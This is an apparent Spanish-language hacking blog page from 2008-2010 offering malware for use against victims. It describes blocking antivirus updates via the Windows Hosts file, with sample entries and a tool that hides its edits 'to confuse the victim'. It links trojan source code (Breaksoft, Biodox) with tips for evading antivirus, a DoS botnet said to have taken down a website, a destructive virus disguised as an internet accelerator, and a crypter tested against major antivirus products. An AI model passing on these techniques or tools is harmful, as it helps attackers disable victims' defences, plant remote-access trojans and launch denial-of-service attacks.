Text Size
Domingo, Agosto 01, 2010

Usuario Conectado

               ¿Sin cuenta todavía?

CODIGO FUENTE

Evitar actualizacion de los antivirus mediante Hosts

remplaza_fecha('15 de abril de 2009');

Una de las tecnicas mas usadas para evitar la actualizaciones de los antivirus y demas programas de seguridad consiste en modificar el archivo Hosts de windows para que los antivirus al resolver los DNS donde tienen sus actualizaciones obtengan una ip falsa, y asi evitar que se actualizen.

alt

alt

Ahora no explicare como funciona este archivo Hosts, pero recomiendo que lean "El Pharming y sus consecuencias" para saber todo lo que necesitan saber sobre este archivo, ya que escribire como si supieran esto (es algo muy basico).

Ejemplo
El antivirus Nod32 utiliza varios servidores para realizar sus actualizaciones, entonces si agregamos cada uno de los dominios de dichos servidores al archivo hosts acompañados de una ip falsa cualquiera a su izquierda, cuando el antivirus requiera actualizacion siempre "revisara" de alguna manera el archivo host para verificar si existe alguna coincidencia del dominio requerido, y al ver que existe coincidencia con el dominio intentara conectarse a la IP que se le asigno a la izquierda del dominio, como en esa IP no se encuentran los archivos necesarios para la actualizacion, esta no podra realizarse y generara un error. En caso de que no se hubieran escrito esas lineas con los dominios de las actualizaciones y las ips falsas en el archivo Hosts windows se encargaria de resolver los host automaticamente y si fuera asi obtendria la ip real de ese dominio. Ademas hay que tener en cuenta que el antivirus prueba con distintos dominios por si no funcionan, asi que deben estar todos en el archivo hosts, porque si encuentra alguno y no esta con una ip falsa en el archivo hosts automaticamente resolvera el host y procedera a realizar las descargas de dichas actualizaciones.

IP DNS
127.0.1.1 u20.eset.com
127.0.1.1 u21.eset.com
127.0.1.1 u22.eset.com
...

Este metodo tambien puede utilizarse para evitar las webs de antivirus online como virustotal o novirusthanks, asi cada vez que la victima quiera ingresar en esas webs le de error de que no se encontro el servidor. Tambien servira por si quieren descargar antivirus de sus webs oficiales o simplemente no podran pedir versiones trials, porque para ello necesitan autorizacion del servidor y nunca se podra establecer la conexion.

Proyecto SinAV
SinAV es un proyecto en Visual Basic 6 que hace la tarea automatica de agregar los DNS e ips falsas al archivo Hosts, se trato de agregar los DNS de las descargas de los antivirus mas usados, ademas se agrego sus paginas oficiales y mas servidores como por ejemplo para compras o descargas de pruebas y algunos por ubicacion, como .com.ar o .es, tambien pueden encontrar algunas webs de escaneo online, esta optimizado para funcionar en Win XP, 2000, 2003, NT, y en Vista con permisos de administrador (pueden usar el vista UAC maker).
La aplicacion ademas agrega 100 lineas vacias antes de agregar los DNS y las IPS, para confundir a la victima, y se cierra al terminar de agregar todas las lineas. Se utiliza un timer y La direccion del archivo Host esta encriptada para evitar los antivirus, de nada sirve esto si es detectado jaja.
Obiamente pueden agregarle mas funciones al proyecto y modificarlo como quieran.

alt

El archivo esta 100% indetectable, dudo que dure mas de una semana si lo usan, pero se deja indetectable facilmente, ya que no es una aplicacion que se pueda llamar peligrosa.

Descarga codigo fuente + compilado
SinAV - Evitar actualizacion de los antivirus (rapidshare)
SinAV - Evitar actualizacion de los antivirus (megaupload)
pass: troyanosyvirus.com.ar


VB6 - Troyano Breaksoft incompleto

remplaza_fecha('6 de febrero de 2009');

Hoy les traigo el codigo fuente del troyano Breaksoft supuestamente programado por Skyweb07 en Visual Basic 6.
El troyano no esta completamente terminado, pero si esta funcionando, conecta perfectamente y en windows xp es muy estable.
Esta en español y el codigo es muy facil de entender, a diferencia de lo que es el Biodox v1.0 open source de who. Ideal para los que neseciten una base para crear su propio troyano o RAT en VB6.

alt

Se le pueden hacer muchas modificaciones, sobre todo al servidor, prinsipalmente se podria agregar el autoinicio para windows vista y cuentas limitadas. Y despues reemplazar en el servidor winsock por csocketmaster para que funcione en cualquier pc.

alt

El troyano es detectado, pero se puede dejarlo indetectable cambiando el nombre de algunas variables vitales del servidor, tambien se puede cambiar el nombre de winsock WS por otro, eso generalmente funciona. Y por ultimo cambiar el nombre del proyecto, aplicacion, etc. No deberia haber problema con eso durante algun tiempo.

Descarga
Demo Breaksoft - codigo fuente (rapidshare)
Demo Breaksoft - codigo fuente (megaupload)

Botnet V1 - Mod MiniDos

remplaza_fecha('6 de diciembre de 2008');

Botnet V1 es una modificacion realizada por el autor del Doscite, del antiguo programa MiniDos.

En esta modificacion se renovo el codigo del server casi desde 0, se agrego una api mucho mas poderosa, similar a la usada en el Doscite, tambien se quitaron varias opciones que no servian para nada. El cliente casi no se modifico.

alt

Nesecitan tener instalado el Visual Basic 6, para compilar el programa. Tambien tienen que modificar donde dice LOCALHOST y poner su ip (esta marcado con rojo en la imagen siguiente). El programa funciona en el puerto 4010 TCP, si tienen router tienen que abrirlo o mapearlo al igual que en cualquier troyano.

alt

En cuanto a funcionamiento es muy simple, no es nesesario explicar nada, lo que si les puedo decir es que con 5 bots se logro tirar una web bastante conocida a modo de prueba.
La botnet es open source, asi que pueden modificar el codigo como quieran y sacar nuevas versiones.

Descarga
Botnet V1 - Mod MiniDos (rapidshare)
Botnet V1 - Mod MiniDos (mediafire)

Contraseña: troyanosyvirus.com.ar

Pasen por la web del autor: www.fudsonly.com.ar


Biodox v1.0 OpenSource Edition

remplaza_fecha('18 de noviembre de 2008');

Biodox es un troyano programador por WHO!, el creador del Elite protector. El troyano esta programado en Visual Basic 6, en cuanto a herramientas esta bastante completo, esta en varios idiomas entre ellos español. Por ahora lo detectan algunos antivirus, aunque se saltea bastantes.

Lo mejor de todo es que es codigo abierto y permite que cada uno lo modifique a su gusto, incluso que lo mejoren para despues publicar nuevas versiones con el codigo fuente incluido.

No lo recomiendo para los que recien se inician en el tema y no le funcionan los otros troyanos, ya que este es un poco mas complicado de usar que el resto, y no esta muy bien traducido al español, ademas ocupa 4 puertos distintos.

alt

alt


Descarga Binario:
Biodox v1.0 OpenSource Edition (rapidshare)
Biodox v1.0 OpenSource Edition (mediafire)

Descarga Codigo fuente:
Biodox v1.0 OpenSource Edition source code (rapidshare)
Biodox v1.0 OpenSource Edition source code (mediafire)


InterSpeedNet Virus FUD Open source

remplaza_fecha('13 de septiembre de 2008');

InterSpeedNet es un Virus creado por Eazy, muy simple pero efectivo. Lo bueno que tiene es que es indetectable y open source, ideal para los que quieren aprender sobre el tema.
Solo posteo el virus para que lo analizen y vean como funciona (tambien para que vean que los antivirus no sirven jaja), cada uno se hace responsable del uso del mismo.
Esta creado en Autoit y el source esta al final del post.

alt

El archivo simula ser un Accelerador de velocidad de internet. Lo que hace es crear entradas aleatorias en registro, y dejar completamente inutilizable la pc al que lo ejecute, no la podra ni prender.


Descarga:
InterSpeedNet (Mediafire)
InterSpeedNet (rapidshare)

Source:
InterSpeedNet Source

NO ABRAN EL ARCHIVO SI NO SABEN QUE VAN A HACER, ES UN VIRUS, NO UN GENERADOR DE VIRUS COMO LOS OTROS DEL BLOG, SI LO ABREN NO PODRAN PRENDER LA PC. RECOMIENDO PROBARLO EN MAQUINAS VIRTUALES. TAMPOCO LO SUBAN A VIRUSTOTAL NI WEB SIMILARES

Small Crypter by E0N

remplaza_fecha('19 de abril de 2008');

Small Crypter es un crypter tanto scan-time como run-time que utiliza inyección. Su stub está escrito en asm y un poco retocado a mano, por lo que solamente ocupa 1.3 KB. ¿Qué quiere decir esto? Pues quiere decir que si encriptamos un ejecutable con Small Crypter el tamaño total del mismo solo aunmentará en 1.3KB, es decir, prácticamente nada
Por poner un ejemplo, al encriptar el server del Poison Ivy con Small Crypter el server final solo ocupará 6.6KB.

Testeado con poison ivy 2.3.2 en maquina virtual con avg, nod32 y kav actualizados, se los saltea a todos.

alt


Descarga:
Small Crypter
Small Crypter

Hack y Crack - Hack Y Crack